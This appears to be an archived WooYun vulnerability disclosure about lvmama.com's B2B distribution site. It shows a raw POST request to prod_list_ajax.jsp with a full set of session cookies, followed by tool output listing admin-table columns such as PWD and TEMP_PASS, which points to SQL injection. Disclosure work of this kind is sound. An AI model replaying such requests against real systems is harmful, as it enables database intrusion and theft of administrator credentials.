乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
RT
测试:
POST /b2b/prod_list_ajax.jsp HTTP/1.1Host: fenxiao.lvmama.comProxy-Connection: keep-aliveContent-Length: 178Accept: */*Origin: http://fenxiao.lvmama.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://fenxiao.lvmama.com/b2b/prod_list.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: uid=wKgKb1X79EWfLzjUDjwAAg==; CoreID6=81323363387714425754327&ci=90409730; _lvTrack_UUID=1474E648-6D2E-44E3-AF56-2B3DE7634870; lvsessionid=6eda4b74-db89-4ed6-b3f0-a628d51b5430_18400608; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; JSESSIONID=fK6cK_BxQZF4; startadd=10011; a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9Ua60ma5Iaa5IaY5GiZ6ASb5zmY5w+mJiR2Xpxmb9s2chFzc0EmJfd3YzVFdp9DZy0TNwAjMmc; 87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZy0DO4UTMmgHb0l2XklSPjZXd0N3X5RGc9UiMnZ2X1N3cfRWa9QjMwUDM3InJzVXZfJmbtFTZm0XafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFTMmQXdlNlcp9DZx0jM0MTNmY; sourceid=19; 67df798e21e2dfa38ce087214349f9b3=mcs9VZp9DZz0nJzVXZfJWa9QTMzIDN2UmJiR2Xpxmb9s2chFzc0EmJfd3YzVFdu9WYl1ePKWOolWOtlWOtYa+n6SuuueeoQeuhFWOrPWCujZXd0N2XklTP4ITNxgCOnZ2X1N3cfRWa9QjMwUDM3IgJ==; _lvTrack_sessionID=1BC64181-12AA-4FE6-8B8F-6AC606BDCB6D; orderFromChannel=bing; __utmt=1; __xsptplus443=443.2.1442580067.1442580462.8%234%7C%7C%7C%7C%7C%23%23KC--73_S5PSqQXPHmXJaDKIHJH8ApGTC%23; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442576325; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442580462; __utma=30114658.555334212.1442575433.1442575433.1442579732.2; __utmb=30114658.46.10.1442579732; __utmc=30114658; __utmz=30114658.1442579732.2.2.utmcsr=pufa.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/; bfd_s=30114658.98025856.1442579732433; tmc=38.30114658.23301528.1442579732436.1442580403663.1442580462914; tma=30114658.30289188.1442575434188.1442575434188.1442575434188.1; tmd=53.30114658.30289188.1442575434188.; utag_main=v_id:014fe07d6a09001ee167fbff27b12206d001806500bd0$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1442582263890$ses_id:1442580359689%3Bexp-session; bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDn9J9XTZq5ICUVFiY5xaaSGnswzLnZ5fMPdL9LvzsOTorEZlMtMZiixNZ%2FNAdp4hsOM61BZPExUO3lqlR89zEcWLn%2FRQf9TdmwRUiOVC%2BY7kW1oQwcXil0%2B6ndkhaE9Vcj69K71aZWMxeLoPWcJ4ylPaJgRxh2xifKqrnirxUPjo%3D; bfd_g=9de2782bcb754fd7000031ec004eb3b555fbf449; 90409730_clogin=v=1&l=1442579732&e=1442582334485; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1ePKWOolWOtlWOtYa+n6SuuueeoQeuhFWOrPWCupZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XPhNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmYstart=0&limit=40&key=3213123&tree_id=0&cust_id=&area=&ad=&fw=&pay=&confirm=>=&tag=&line=&group=&tname=&grade=&internet=&brekker=&action=list&testid=1003&sort=view_name&dir=DESC
权限:
ADMIN_LOGIN:
[08:29:32] NAME[08:29:32] EXTENSION_ID[08:29:32] ACCOUNTS[08:29:32] PROVINCIAL[08:29:32] CHROMOSOME_ID[08:29:32] OPERATIONID[08:29:32] TRANSACTION_ID[08:29:32] MSG_ID[08:29:37] ACCOUNT_ID[08:29:41] SCHLUSSELWORT[08:29:49] PWD[08:30:05] AIM[08:30:20] TEMP_PASS
自测 :-)
危害等级:高
漏洞Rank:20
确认时间:2015-10-08 11:01
thx
暂无